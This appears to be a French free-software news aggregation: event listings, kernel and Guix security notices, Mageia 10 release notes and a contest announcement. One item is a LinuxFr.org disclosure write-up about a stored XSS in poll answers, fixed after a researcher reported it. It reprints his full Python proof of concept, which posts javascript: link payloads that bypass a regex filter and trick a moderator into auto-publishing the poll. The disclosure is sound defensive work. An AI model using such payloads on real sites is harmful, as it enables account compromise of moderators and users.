Rejoignez-nous pour cette opportunité exceptionnelle de socialiser, d’apprendre, et de tisser des liens !

Nous avons hâte de vous y accueillir.

Le Comité organisateur des Rencontres Linux au Québec

[FR Amancy] Rencontre « Logiciels Libres » – Le samedi 11 juillet 2026 de 09h00 à 12h00.

Rencontre mensuelle autour des logiciels libres, en toute simplicité.

Ces matinées seront ce que nous en ferons ensemble, selon vos attentes:

  • Découverte des logiciels libres dont Linux et de leur intérêt. Utilisation sur place.
  • Installations, sur votre machine (pensez à sauvegarder vos données avant de venir avec) ou sur des PC fournis pour apprendre ensemble sans risque. Parfois, on vous propose un ordinateur auquel Linux a redonné une seconde vie, avec lequel vous pouvez repartir…
  • Préparation d’une clé USB pour tester Linux chez vous, l’installer ou alors pour utiliser des logiciels libres sans installation sous Windows.
  • Entraide, suivi de votre expérience avec les logiciels libres.
  • Nous pourrons aussi nous intéresser aux outils en ligne, aux smartphones, ou nous amuser à redonner vie à de vieux PC un peu obsolètes, à reconditionner des ordinateurs pour des associations ou personnes avec peu de ressources, etc.

Pour tout projet qui risque de prendre un peu de temps, il est préférable de nous contacter avant.

Les débutant·e·s sont les bienvenu·e·s! Les autres aussi, bien évidemment !

[FR Chaumont] Permanence Informatique – Le samedi 11 juillet 2026 de 09h00 à 12h00.

REVOL, association engagée dans la promotion des logiciels libres, propose tous les samedis matin, de 9h à 12h, une permanence informatique associative ouverte à toustes, pour se pencher sur les difficultés rencontrées par chacun·e dans son usage de l’outil numérique.

=> Vous avez un problème avec votre ordinateur ?
=> Une question sur un logiciel libre ?
=> Envie de comprendre un peu mieux comment ça fonctionne ?

On prend le temps avec vous, simplement.

Nous pouvons vous accompagner sur:

  • le passage vers des systèmes libres (Linux Mint, MX Linux…)
  • l’installation et la prise en main de logiciels libres
  • la remise en état et la mise à jour de votre ordinateur (quand c’est possible)
  • des conseils pour mieux utiliser, sécuriser et prolonger la vie de votre matériel

Et aussi… juste discuter (on a du café et des croissants).
Que ce soit pour poser une question, réfléchir à vos usages ou découvrir le libre tranquillement.

Pas besoin d’être expert·e: venez comme vous êtes.

Nous sommes à notre local, 22 rue de Verdun à Chaumont (52000), en Haute-Marne.

Un monde plus libre, loin des techno-fascistes, ça serait 🦉 quand même, non ?

REVOL est là pour y contribuer !

[FR Montpellier] Rencontre | Pique-nique du Libre – Le samedi 11 juillet 2026 de 17h00 à 19h00.

Montpel’libre et ses partenaires vous proposent de nous retrouver comme chaque année toutes et tous, pour clore cette année très intense dans un esprit festif, à l’occasion d’un pique-nique au Parc Rimbaud dans le quartier Les Aubes de Montpellier. Où, les familles, enfants, curieux et bien sûr libristes sont les bienvenus.

Ce pique-nique traditionnel de fin d’année des libristes de toute la région est organisé pour boucler l’année dans la bonne humeur, évoquer les moments importants qui se sont déroulés dans l’année et ceux qui nous attendent à la rentrée. Ce traditionnel rendez-vous est devenu, au fil du temps et selon la presse, une véritable institution.

Nous serions heureux de compter sur votre présence à cet instant convivial et de partage de la communauté des Logiciels Libres et des Communs de la région.

Attention, privilégiez les transports en commun, les emplacements de parking à proximité sont rares!

L’inscription n’est pas obligatoire, mais fortement recommandée pour des raisons évidentes de contraintes logistique.

Cette année encore, afin de nous mettre en conformité avec l’arrêté préfectoral, les barbecues et tout feu seront interdits, le repas sera donc froid.

Pas de réseau wifi, ni électrique, pensez à prendre des lampes.

Le site dispose à l’entrée d’une petite aire de jeux pour les enfants, d’un parc clôturé pour les chiens, de balades, randonnées, tables, potager, boulodrome, vue sur le rivière.

Chacun apporte quelque chose, et on partage. Pensez à prendre de l’eau, des brumisateurs, des chapeaux pour supporter les fortes chaleurs. Prévoyez aussi des boules de pétanque.

[FR Montpellier] Rencontre | Wiknic – Le samedi 11 juillet 2026 de 19h00 à 21h00.

Rencontre | Wiknic

Ce pique-nique traditionnel de fin d’année des libristes de toute la région est organisé pour boucler l’année dans la bonne humeur, évoquer les moments importants qui se sont déroulés dans l’année et ceux qui nous attendent à la rentrée. Ce traditionnel rendez-vous est devenu, au fil du temps et selon la presse, une véritable institution.

Samedi 11 juillet 2026 de 19h00 à 21h00
Parc Rimbaud, 880 avenue de Saint-Maur, 34000 Montpellier

Inscriptions | GPS 43.61797/3.89607

[FR Redon] Install Party – Le dimanche 12 juillet 2026 de 14h00 à 18h00.

Fin du support Windows? Ne jetez pas votre PC: venez découvrir et installer Linux sur votre ordinateur.

Plusieurs bénévoles à l’aise en informatique prendront le temps de connaitre votre situation, et de vous proposer une marche à suivre.

Si possible, préparez vos sauvegardes des documents importants avant de venir.

Sinon, venez avec un disque dur ou clé USB de grande capacité pour les sauvegarder avec notre aide et un peu de temps (la sauvegarde de vos données peut prendre du temps!).

Entrée libre et gratuite,

Organisé par le Collectif Low Tech du Pays de Redon

[FR Redon] Install Party Linux – Le dimanche 12 juillet 2026 de 14h00 à 18h00.

Fin du support Windows ? Ne jetez pas votre PC: venez découvrir et installer Linux sur votre ordinateur.

Plusieurs bénévoles à l’aise en informatique prendront le temps de connaitre votre situation, et de vous proposer une marche à suivre.

Si possible, préparez vos sauvegardes des documents importants avant de venir.
Sinon, venez avec un disque dur ou clé USB de grande capacité pour les sauvegarder avec notre aide et un peu de temps (la sauvegarde de vos données peut prendre du temps !).

Entrée libre et gratuite, rdv 14h

Organisé par le Collectif Low Tech du Pays de Redon

[FR Béziers] Rencontre | Pique-nique du Libre – Le dimanche 12 juillet 2026 de 17h00 à 19h00.

Montpel’libre vous propose de nous retrouver toutes et tous, pour clore cette année très intense dans un esprit festif, à l’occasion d’un pique-nique au Plateau des Poètes, Allées Paul Riquet à Béziers. Où, les familles, enfants, curieux et bien sûr libristes sont les bienvenus.

Ce pique-nique de fin d’année des libristes de toute la région est organisé pour boucler l’année dans la bonne humeur, évoquer les moments importants qui se sont déroulés dans l’année et ceux qui nous attendent à la rentrée.

Les pique-niques de l’été
Samedi 11 juillet 2026 à partir de 17h00, Pique-nique du Libre, au Parc Rimbaud à Montpellier.
Samedi 11 juillet 2026 à partir de 19h00, Wiknic (Cabalhérault), au Parc Rimbaud à Montpellier.
Dimanche 12 juillet 2026 à partir de 17h00, Pique-nique du Libre, au Plateau des Poètes à Béziers.
Samedi 18 juillet 2026 à partir de 17h00, Pique-nique du Libre, aux Jardins de la Fontaine à Nîmes.
Dimanche 19 juillet 2026 à partir de 17h00, Pique-nique du Libre, à Pierres Blanches à Sète.
Dimanche 26 juillet 2026 à partir de 17h00, Pique-nique du Libre, au Parc Jean Hugo à Lunel.

Choisissez votre pique-nique. Mais bien sûr, vous pouvez participer à plusieurs pique-niques, voire à tous !

L’été est là, bien installé, les oiseaux chantent, le soleil est au beau fixe, et vous souhaitez déjeuner entre amis sur l’herbe fraîchement coupée.

Dès que l’on recommence à avoir des journées ensoleillées et chaudes, nous savons tous et toutes que la saison des pique-niques est arrivée ! Nous aimons, à n’en pas douter, absolument tout du concept des pique-niques: manger à l’extérieur sous le soleil ou à l’ombre des arbres, partager un repas convivial, simple, à la bonne franquette entre amis, avec la famille, profiter de la beauté de la nature qui nous entoure, prendre son temps et apprendre à ralentir et à reconnecter au moment présent le temps d’un repas.

Même si l’été est déjà bien entamé, nous avons encore beaucoup de belles journées chaudes à venir et la chance de faire de nombreux pique-niques avant la fin de la saison estivale.

Afin de favoriser l’échange et la convivialité, nous vous invitons à participer à ces repas partagés. Chaque participant est encouragé à apporter un plat fait maison (entrée, plat principal, dessert, fruits, boissons…) à partager avec les autres. C’est l’occasion de découvrir de nouvelles saveurs tout en échangeant des idées et des expériences autour, vous l’aurez deviné, des logiciels libres.

Ces rencontres sont aussi l’occasion de discuter des projets communautaires, d’apprendre ensemble, et de promouvoir un mode de vie plus libre, collaboratif et respectueux de l’environnement. N’hésitez pas à apporter également des jeux de plein air ou des instruments de musique pour ajouter encore plus de convivialité et de bonne humeur à ces moments partagés en pleine nature que nous affectionnons tous et toutes.

Commentaires : voir le flux Atom ouvrir dans le navigateur

Reçu — 4 juillet 2026 Actualités libres

Seven stable kernels for Saturday including two security fixes

Par : jzb
4 juillet 2026 à 16:46

Greg Kroah-Hartman has announced the release of the 7.1.3, 6.18.38, 6.12.95, 6.6.144, 6.1.177, 5.15.211, and 5.10.260 stable kernels. Several kernels in this batch include a fix for a vulnerability introduced in the 6.0 kernel in IPv6 (CVE-2026-53362), which could allow an attacker to escape a container and gain root access.

There is also a fix for a use-after-free bug in KVM (CVE-2026-53359) that was introduced in the 2.6.36 kernel. As usual, each stable kernel includes a number of fixes throughout the tree. Users are advised to upgrade.

Reçu — 3 juillet 2026 Actualités libres

Four vulnerabilities in Guix

Par : jzb
3 juillet 2026 à 15:54

The GNU Guix project has announced three vulnerabilities in the guix substitute utility as well as a fourth that affects the guix pull and guix time-machine commands. The impact of the vulnerabilities ranges from remote privilege escalation to local disclosure of sensitive files.

The remote exploitation of guix substitute only requires that the vulnerable system attempt to download a binary substitute. Any configured substitute server, including ones discovered using guix-daemon's --discover option, can exploit this, and so can a man-in-the-middle (MITM), regardless of whether https is used in the substitute server urls.

The local exploitation of guix substitute only requires the ability to connect to guix-daemon's socket, which by default any user can do.

Separately, another security issue (CVE ID pending) was identified in guix pull and guix time-machine, which enables anyone who can control the channels file used by these commands to cause a file to be created or overwritten wherever the user running the command in question has permission to create them.

The project is recommending that all users upgrade guix and guix-daemon immediately. See the announcement for instructions, how to test for the vulnerabilities, the disclosure timeline, and more.

[$] Limiting negative dentries

Par : jake
3 juillet 2026 à 14:10
A number of problems related to negative directory entries (dentries) were the topic of a filesystem-track session at the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit. Negative dentries are used to indicate that a file of a given name does not exist in a directory; it is an optimization that short-circuits the lookup of the file name when the answer is already known. Miklos Szeredi led a session that discussed some problems that come from having too many negative dentries for a directory.

Security updates for Friday

Par : jzb
3 juillet 2026 à 13:03
Security updates have been issued by AlmaLinux (389-ds-base, bind9.18, evince, fence-agents, freerdp, frr, frr10, gimp, gnutls, hplip, jmc, mariadb:11.8, mysql:8.4, php:7.4, postgresql-jdbc, postgresql:15, postgresql:16, valkey, xorg-x11-server, and xorg-x11-server-Xwayland), Debian (fastnetmon), Fedora (7zip, apptainer, cpp-httplib, mysql8.4, and nmap), Oracle (freerdp, giflib, glib2, glibc, kernel, libreoffice, libvirt, mariadb:10.11, postgresql, python3.11, python3.12, rrdtool, and thunderbird), Red Hat (buildah, podman, and skopeo), SUSE (alloy, apache2, buildah, c3p0, containerd, crun, cups, dhcpcd, dnsmasq, docker-stable, dracut, editorconfig-core-c, ffmpeg-7, fontforge, google-guest-agent, google-osconfig-agent, graphicsmagick, gstreamer-plugins-bad, gstreamer-plugins-good, helm, jackson-annotations, jackson-core, jackson-databind, jline3, kernel, kubectl-cnpg, lcms2, libslirp, libssh2_org, libxreaderdocument3, openbabel, openssl-3, pacemaker, perl-CGI-Session, perl-list-someutils-xs, python-lxml, python-tornado, python-tornado6, python3-onionshare, python311-python-engineio, sg3_utils, thunderbird, transmission, and trivy), and Ubuntu (cifs-utils, kernel, libvncserver, linux-aws-6.8, linux-gcp-6.8, linux-gke, linux-gkeop, linux-ibm-6.8, linux-nvidia-lowlatency, linux-oracle-6.8, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-nvidia-tegra, linux-oracle-5.15, linux-raspi, linux-xilinx, nghttp2, nginx, perl, and vim).
Reçu — 2 juillet 2026 Actualités libres

XSS sur le site linuxfr.org (pas très grave à mon avis)

2 juillet 2026 à 21:05

Ce titre est celui d’un courriel reçu le samedi 20 juin 2026 en fin de soirée. La France est alors au milieu de sa deuxième canicule de l’année, et moi en train de produire la dépêche De la fermeture des comptes inactifs depuis 3 ans que je pensais initialement en avance et qui était finalement en retard.

Et donc recevoir un tel message n’annonçait rien de bien rafraîchissant. (Même si ça changeait des week-ends successifs d’annonces de failles de sécurité noyau à déployer plus ou moins en urgence)

Pourtant il s’agissait du signalement d’une faille réelle, fait de façon détaillée, claire et pédagogique. Ça change du bruit de fond habituel sur Internet avec son lot de tentatives diverses et variées d’injections chimériques mi-SQL mi-Javascript mi-PHP, et ses fameux audits de sécurité non-sollicités et délicieusement bourrins. Grand merci donc à 0xMitsurugi H pour avoir explicité le problème.

Sommaire

Le signalement

L’explication

(avec l’autorisation de l’auteur «  mon code et le rapport sont open source »)

Bonjour,

J’ai lu le code source de linuxfr.org et je me suis intéressé aux sondages.
J’ai l’impression que certains échappements HTML ne fonctionnent pas très bien.

Il est possible de bypasser la regexp dans les réponses du sondage et
injecter du javascript dans les réponses.

En soi, ce ne serait pas grave, car un sondage doit être validé par un admin
pour que les utilisateurs le voient.

L’astuce ici consiste à utiliser une réponse avec du js qui fera valider
automatiquement le sondage par un admin, et mettre un second javascript
dans une autre réponse destiné aux utilisateurs, une fois le sondage
validé, permettant la compromission de tous les utilisateurs qui vont
cliquer sur le sondage.

Voici le poc en python (inliné dans le mail car google fait des dingueries
avec les pièces jointes en python):
#!/usr/bin/env python3
r"""
PoC — XSS stockee via linkify dans les reponses de sondage linuxfr.org

Vecteur : href="javascript:..." active au clic
Bypass regex : tagged template ` func`arg` ` au lieu de func('arg')
  - document.querySelector`.ok_button`  au lieu de
document.querySelector('.ok_button')
  - form.submit``                      au lieu de form.submit()
  - alert`msg`                         au lieu de alert('msg')
  Aucune parenthese `)` n'apparait dans l'URL markdown, donc la regex
  \[([^\]]*)\]\(([^)]*)\) ne peut rien manger.

Contrainte : 128 caracteres max (PollAnswer)
  Phase 1 : 64 car. (form.submit pour auto-publication)
  Phase 2 : 54 car. (alert de preuve)

Deroulement :
  1. Attaquant cree un sondage avec les payloads XSS
  2. Moderateuur visite /moderation/sondages/ID et clique sur [a]
  3. La publication se fait sans boite de confirmation
  4. Les visiteurs cliquent sur [b] -> alerte JavaScript

Usage :
  python3 poc.py <url> <user_session>

  <url>            : racine du site (ex: http://dlfp.lo)
  <user_session>   : valeur du cookie linuxfr.org_session (compte standard)

Exemple :
  python3 poc.py http://dlfp.lo "user_session_value"

Prerequis :
  pip install requests
"""

import re
import sys
from urllib.parse import urljoin, urlparse

import requests


def e(msg: str, code: int = 1) -> None:
    print(f"[-] {msg}")
    sys.exit(code)


def s(msg: str) -> None:
    print(f"[+] {msg}")


def info(msg: str) -> None:
    print(f"[*] {msg}")


def banner() -> None:
    print("=" * 68)
    print("  PoC — XSS linkify -> Auto-validation + XSS proof")
    print("  Vecteur : tagged templates dans href (pas de ) necessaire)")
    print("  Cible : linuxfr.org")
    print("=" * 68)


def make_session(cookie_value: str, target_url: str) -> requests.Session:
    s = requests.Session()
    hostname = urlparse(target_url).hostname
    s.cookies.set("linuxfr.org_session", cookie_value, domain=hostname)
    return s


def create_poll(url: str, session: requests.Session,) -> tuple[str, str]:
    """
    Cree un sondage avec les reponses malveillantes.
    """

    # Réponse 1 : 64 car. — form.submit() via tagged template
    # document.querySelector`.ok_button`   => querySelector('.ok_button')
    # form.submit``                        => form.submit()
    payload_phase1 = (
        "[a]"
        "(javascript:document.querySelector"
        "`.ok_button`.form.submit``)"
    )

    # Réponse 2 : 54 car. — alert via tagged template
    payload_phase2 = (
        "[b]"
        "(javascript:alert"
        "`smile this is your favorite XSS`)"
    )

    info("Chargement du formulaire de creation...")
    r = session.get(urljoin(url, "/sondages/nouveau"))
    csrf = re.search(
        r'name="authenticity_token" value="([^"]*)"', r.text
    )
    csrf = csrf.group(1)

    info("Creation du sondage malveillant...")
    r = session.post(urljoin(url, "/sondages"), data={
        "authenticity_token": csrf,
        "poll[title]": "PoC XSS — tagged template",
        "poll[wiki_explanations]": (
            "Cliquez sur les liens ci-dessous !"
        ),
        "poll[cc_licensed]": "1",
        "poll[answers_attributes][0][answer]": payload_phase1,
        "poll[answers_attributes][1][answer]": payload_phase2,
    })

    if r.status_code not in (200, 302):
        e(f"Creation echouee (HTTP {r.status_code})")

    print("Connectez vous en tant qu'admin et cliquez sur la réponse A")


def main():
    banner()

    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} <url> <user_session>")
        print()
        print("Exemple :")
        print(f'  {sys.argv[0]} http://dlfp.lo "SESSION_USER"')
        sys.exit(1)

    target_url = sys.argv[1].rstrip("/")
    user_session_val = sys.argv[2]

    user_session = make_session(user_session_val, target_url)

    # Creation du sondage malveillant
    print()
    info("Creation du sondage avec payloads XSS")
    create_poll(target_url, user_session)


if __name__ == "__main__":
    main()
Et je joins les copies d’écran dans l’ordre :-)

C’était sympa à trigger, je ne pensais pas arriver à quelque chose avec
l’autovalidation de l’admin pour publier le sondage. Bon, il faut quand
même l’interaction d’un admin (d’où le fait que ce n’est pas très grave),
j’ai essayé des trucs à base de onmouseover, mais je n’arrive à rien de
bien ce soir, il fait trop chaud.

Merci de gérer et maintenir le site linuxfr, j’ai appris beaucoup de choses
en le lisant, même si je ne suis qu’un simple lecteur :-)
Merci de fournir le code source sur github, ça m’a permis de debug en live
mes tests.

Bonne soirée

Et paf le PoC !

Les cinq images étaient en pièces jointes du signalement.

La démonstration à l’œuvre :

La démonstration à l’œuvre

En admin, le nouveau sondage dans la page des sondages :

Le nouveau sondage dans la page des sondages

En admin, cliquer sur un choix autovalide le sondage :

Cliquer sur un choix permet autovalide le sondage

Et sur le sondage publié, un clic d’un compte utilisateur :

Et sur le sondage publié, un clic

Paf la faille :

Paf la faille

Un peu de contexte

La faille signalée concerne le type de contenu sondages du site LinuxFr.org : un sondage est une question sur un thème donné ; le lectorat du site LinuxFr.org peut choisir parmi un ensemble de réponses proposées. (aide)

Une personne ayant un compte sur le site peut proposer un sondage (aide). Sa publication nécessite une approbation par l’équipe de modération (aide).

Un sondage est composé d’une partie question en Markdown. Et de (en général) plusieurs réponses dans un format exotique : c’est du texte brut, pas de mises en forme en italique/gras ou autre, sauf que les liens au format Markdown [oh un lien](https://une.adresse.invalid) sont possibles, depuis 2012. Ce code pour gérer du supposé texte brut mais acceptant des hyperliens Markdown, avec une expression rationnelle pour gérer, forcément ça annonçait un hypothétique problème à venir.

« Le cross-site scripting (abrégé XSS) est un type de faille de sécurité des sites web permettant d'injecter du contenu dans une page, provoquant ainsi des actions sur les navigateurs web visitant la page. » (Wikipedia) : ici on va glisser un sondage malveillant dans la base de données LinuxFr.org, une personne modératrice va aller le lire et déclencher involontairement la publication, qui devient alors visible par tout le monde, et chaque personne qui ira voter sur le sondage va déclencher un comportement non désiré. Bon en pratique, à ce moment là, ladite personne modératrice se rendrait alors compte du problème et dépublierait le sondage en catastrophe. Potentiellement trop tard pour quelques personnes du lectorat avides de sondages.

Une vraie faille

Bon si ça se trouve, la faille ne fonctionne pas, c’est facile de tester et de voir si on reproduit. Bon on reproduit…

En analysant le code et en testant, on voit qu’il y a plusieurs soucis :

  • on peut insérer en base de données des choses que l’on ne voudrait pas y voir ;
  • on peut afficher ce qu’on a trouvé en base en filtrant mal.

Donc on va ajouter un filtrage à la création sur les hyperliens pour ne laisser passer que les protocoles autorisés et que des adresses qui ressemblent à des adresses.

Et on va ajouter un filtrage à l’affichage / conversion en HTML pour n’afficher que des hyperliens, dans les protocoles autorisés et avec une adresse qui ressemble à une adresse.

Évidemment il y a la contrainte de ne pas casser le fonctionnel et les sondages déjà présents en base de données.

Donc on fait plein de tests un peu cracra :

tests un peu cracra

Et on produit un commit de correction (si tout va bien).

On a aussi vérifié le contenu existant de la base, au cas où.

Il ne restait plus qu’à remercier le contributeur et à convenir d’une publication en dépêche. Que voici.

Conclusion

Une contribution par une personne qui a lu le code source, qui a déployé le site, qui a écrit un bout de code pour illustrer l’exploitation de la faille de bout-en-bout, qui a littéralement illustré l’exploitation avec cinq images et qui a accompagné le tout d’une explication détaillée et en fournissant le code. Que demander de plus ? Encore merci.

Ah oui il faut une ouverture finale et tenir en haleine le lectorat : cette dépêche n'évoque pas la dernière faille signalée (ni même l'avant-dernière), et on n'est que douze jours après.

Commentaires : voir le flux Atom ouvrir dans le navigateur

CalyxOS is back

Par : jzb
2 juillet 2026 à 20:58

In August 2025, the CalyxOS privacy-focused Android distribution announced that it was pausing all releases while it reworked its release process, security protocols, and changed its signing keys following the departure of one of its founders. The project has now announced that it is "officially back from the hiatus" with the 7.2.2.0 release.

CalyxOS 7.2.2.0 is signed by us using a new HSM-based, open-source signing solution we designed to enhance the security of the entire signing process, ensure redundancy, and remove single points of failure. You can verify CalyxOS 7.2.2.0 and future builds following these instructions. For anyone who is interested, the security audit report of the HSM provisioning ceremony script can be found here.

In addition, we also went through significant infrastructure improvements. In particular, we have set up a cleaner server structure to streamline each release. In response to Google's less frequent AOSP source code releases, our team developed scripts to reduce the overhead in applying monthly patches and updates. Please keep in mind, additional manual steps are still needed to compensate for AOSP changes, such as requesting and storing kernel sources with each update. Currently, our lead engineer is continuing the maintenance of the base device trees for both LineageOS and CalyxOS to bridge the gap created by the absence of Google Pixel device trees.

Kernel archive /pub tree restoring

Par : jzb
2 juillet 2026 à 16:39

A few astute observers have noticed that some content on kernel.org had disappeared and were understandably concerned. Konstantin Ryabitsev has provided an update via social.kernel.org:

There was an unfortunate error while changing the kernel.org primary/secondary mirroring infrastructure, which resulted in the /pub tree suddenly becoming empty. No data was lost, just public mirror copies. Everything is now being restored, but deletes are fast and restores are slow, so thank you for your patience!

The incident is being tracked on the Linux Foundation's IT status page.

Spoofed email from LWN

Par : jzb
2 juillet 2026 à 16:20

We were made aware today of an email sent to a reader that was spoofed to appear to be from LWN. The message claimed, among other things, that we were providing personal information about the reader to another site user. As is explained in our privacy policy we do not, and would not, provide such information.

If any other readers have received an odd message from LWN, it is an attempt at a hoax; if in doubt, please check the DKIM header of the email. Any email that does come from LWN will have a proper DKIM signature in its headers.

If you receive such a message, please feel free to send it to us, with its headers intact. But to reiterate, we are not providing any user information upon request, nor banning any accounts. We hope this will not be a recurring problem.

Plus de place sur votre smartphone ? Cette offre de stockage à vie tombe à pic [Sponso]

9 juillet 2026 à 13:14

Cet article a été réalisé en collaboration avec pCloud

Parmi les fournisseurs d’espace de stockage en ligne, pCloud est l'un des plus avantageux. Sécurisé et pérenne, il vous permet de stocker « à vie » vos fichiers importants. Jusqu’au 15 juillet, pour célébrer la fête nationale, pCloud propose de très belles réductions sur ses différentes offres. 

Cet article a été réalisé en collaboration avec pCloud

Il s’agit d’un contenu créé par des rédacteurs indépendants au sein de l’entité Humanoid xp. L’équipe éditoriale de Numerama n’a pas participé à sa création. Nous nous engageons auprès de nos lecteurs pour que ces contenus soient intéressants, qualitatifs et correspondent à leurs intérêts.

En savoir plus

Reçu — 1 juillet 2026 Actualités libres

Mageia 10 : le manchot sort du chaudron !

1 juillet 2026 à 16:13

La nouvelle mouture de la distribution Linux communautaire Mageia est disponible : la version 10 fait sortir le manchot du chaudron ! Les personnes connaissant la distribution comprendront l’allusion ;-)   Cauldron — le chaudron — étant la version de développement, il est naturel d’en obtenir une version installable stabilisée périodiquement.

À vos téléchargements pour utiliser cette nouvelle mouture.

Cette version 10 de Mageia marque les 16 ans du lancement de la distribution (septembre 2010), elle s’inscrit dans la continuité de Mageia 9 qui nous a accompagnés et a évolué depuis plus de 2 ans et ½   ;-)

Versions disponibles

Mageia 10 est classiquement proposée à l’installation avec différents choix :

  • image ISO Live avec Plasma/KDE, GNOME seulement en x86_64, XFCE en x86_64 et i686 ;
  • image de DVD/clé USB d’installation (plus) complète en x86_64 et i686 avec choix du bureau ou serveur ;
  • image d’installation réseau en x86_64 et i686, permettant une installation minimaliste ou plus complète avec les méta-paquets task- (plasma, gnome, lxqt, lamp-php, edu, astronomy…).

Nouveautés

Mises à jour des environnements de bureau

  • Plasma KDE 6.5.5
  • GNOME 49
  • XFCE 4.20
  • ainsi que Cinnamon, Enlightenment, LXDE, LxQt, MATE et quelques window managers FVWM (2 & 3), swm, twm, WindowMaker, xfwm… ainsi que quelques compositeurs Wayland comme hyprland, sway…

Au niveau des logiciels, GIMP 3.2.4 (GIMP 2.10 n’est plus disponible, mais à qui va-t-il manquer ?), FreeCAD 1.1.1, Inkscape 1.4.4, Mathmod 13.0…

Nouvelle apparence pour Mageia 10

Points marquants

Mageia 10 est sans doute la dernière version à proposer Plasma 6.5.5 et GNOME 49 pour X11. En effet, la version suivante GNOME 50 sortie récemment commence les travaux de suppression de la prise en charge de X.org : c’est Wayland qui est désormais standard. Ceci explique certainement le fait que Mageia fait le choix de ne pas passer vers Gnome 50.

Concernant l’architecture 32 bits, ses jours^W mois sont sans doute comptés aussi : c’est i686 qui est encore proposé à l’installation (et non plus i586). Dommage pour les EeePC avec les processeurs Intel Atom N270 (déjà que la résolution d’écran de 1024x600 n’aidait pas trop :/). Pour les jeux, Wine 11.0 est fourni avec Wine-Wow64, permettant de bénéficier de meilleures performances et de faire fonctionner des applications et jeux 32 bits sans paquets dédiés 32 bits, ce qui évite d’avoir à activer les dépôts 32 bits sur une distribution x86_64.

Lors du cycle de publication de Mageia 10, des failles critiques du noyau Linux ont été prises en compte : CopyFail (CVE-2026-31431) par fourniture du noyau 6.18.22 et suivants incluant les correctifs, puis DirtyFrag (CVE-2026-46300, mise à jour noyau), puis Fragnesia (CVE-2026-46300), puis vulnérabilité dans ptrace (CVE-2026-46333, mise à jour noyau 6.18.30 avec patch pour get_dumpable dans ptrace, le noyau 6.18.31 incluant déjà le patch). Les mises à jour correspondantes pour le noyau 6.6.x LTS de Mageia 9 ont aussi été proposées, elles sont tracées dans les advisories Mageia MGASA- lorsque suivies par l’équipe sécurité et dans le changelog du noyau (urpmq - i --changelog kernel-desktop-latest) lorsqu’un patch est spécifiquement appliqué (sinon voir le changelog de la version officielle du noyau).

Montées de versions successives de Firefox 140.6 à 140.11 LTS : consommation mémoire améliorée ?

Le paquet chromium-browser-stable 136 a été le dernier fourni en Mageia 9 et a dû être abandonné par manque de mainteneur pour Mageia 10 : l’installation peut être effectuée via flatpak ou passer au paquet RPM de Chrome disponible chez Google. Si un nouveau mainteneur se manifeste, il pourrait redevenir disponible pour Mageia 10 via les updates, avis aux personnes motivées à devenir empaqueteur _o/ (même si ce n’est clairement pas le paquet le plus simple pour commencer).

En contrepartie, des navigateurs pour le protocole Gemini ont été ajoutés : Lagrange (SDL), Kristall (Qt), Offpunk (CLI).

Jeux et autres logiciels (liste non exhaustive)

0ad 0.28 a été actualisé à la version « Bolorix ».

Flightgear en version 2024.1.5 un simulateur de vol ayant ses fans sur MLO (plus de 586 pages dans le fil du forum jeux).

Rocks 'n Diamonds est en version 4.4.1.2 (et a plus de 30 ans !)

Audacity en version 3.7.7 — la 3.7.8 étant sortie après la rc1, à voir si elle fera son chemin dans les updates — pour profiter des greffons Tempo tracks, LADSPA, et analyseur Vamp tant qu’ils sont encore disponibles.

FreeCAD 1.1.1 pour la modélisation 3D en fablab intégré lors du cycle de bêta de Mageia 10 (Mars 2026) sera la dernière suivant cette numérotation, le choix du passage à CalVer étant entériné

Inkscape 1.4.4 pour avoir une version de maintenance de la branche 1.4.x à jour apportant moins de plantages et plus de performances.

LibreOffice 26.2.3.2 la suite de bureau, à voir si la prochaine version à venir 26.8 sera ajoutée dans les updates pour la rentrée des classes ;-)

Les paquets pour le serveur et le client Nextcloud en version 32 font leur retour avec Mageia 10.

Communauté et contributions

Présent avec un stand à Capitole du libre en novembre 2025, au PSL XXL et visite à l’OSXP en décembre 2025, JDLL fin mai 2026.

Nos amis de MageiaLinux-Online (MLO) sont toujours de la partie _o/ Tutoriels et forums en français vous accueillent. Rendez-vous à la rentrée pour install'parties et événements du Libre ;-)

Commentaires : voir le flux Atom ouvrir dans le navigateur

Podcast Projets Libres saison 4 épisode 19 : surveiller les grandes plateformes grâce à Open Terms Archive

Titre de l'image

Comment rendre plus transparents les changements des conditions d'utilisation des grands services numériques ?
Pour ce nouvel épisode sur les communs numériques, nous partons à la découverte d'Open Terms Archive !

Open Terms Archive permet de suivre et alerter des changements qui se cachent dans ces documents peu compréhensibles.

Avec Sydney Wheeler et Matti Schneider nous revenons sur :

  • la genèse du projet
  • sa gouvernance et sa communauté
  • son fonctionnement
  • ses défis de structuration après sa phase d'incubation au sein du ministère des affaires étrangères jusqu'à janvier 2026
  • son utilisation en dehors de la France

Commentaires : voir le flux Atom ouvrir dans le navigateur

Reçu — 30 juin 2026 Actualités libres

Concours des Acteurs du Libre - 10 ans déja !

🚀🚀 Le concours des Acteurs du Libre 2026 est lancé !

Vous êtes un acteur professionnel de l’opensource ? Éditeur, utilisateur, ou intégrateur ? C'est le moment de mettre en lumière vos projets et vos équipes devant l'écosystème français et européen.

Titre de l'image

Cette édition sera toute particulière puisque nous fêterons les 10 ans du concours. Une décennie centrée sur le partage, l'innovation ouverte et la souveraineté numérique, que nous célébrerons ensemble à l'occasion d'Open Source Experience, les 9-10 décembre 2026 à Paris (Porte de Versailles).

Organisé par le CNLL, en collaboration avec Open Source Experience, ce prix récompense les projets innovants du logiciel Libre (le hardware n’est pas concerné).

Les 6 catégories de cette année :
🔹 Meilleure stratégie open source (pour les grands groupes)
🔹 Prix du numérique ouvert et éthique
🔹 Prix commercial
🔹 Prix de la collaboration public-privé
🔹 Prix du meilleur projet
🔹 Prix Européen (en collaboration avec l'APELL, pour les organisations hors de France)

Le jury 2026 est en place et inclut comme chaque année une partie des gagnants de la session précédente, assurant ainsi un renouvellement et une variété des profils !

Pour vérifier les conditions d'éligibilité et envoyer votre pré-candidature, c'est par ici : lesacteursdulibre.com

Le concours des Acteurs du Libre récompense chaque année les entreprises et entrepreneurs qui contribuent par leurs actions au développement du logiciel Libre. Les associations et projets du libre sont autorisés à candidater aussi.

Commentaires : voir le flux Atom ouvrir dans le navigateur

❌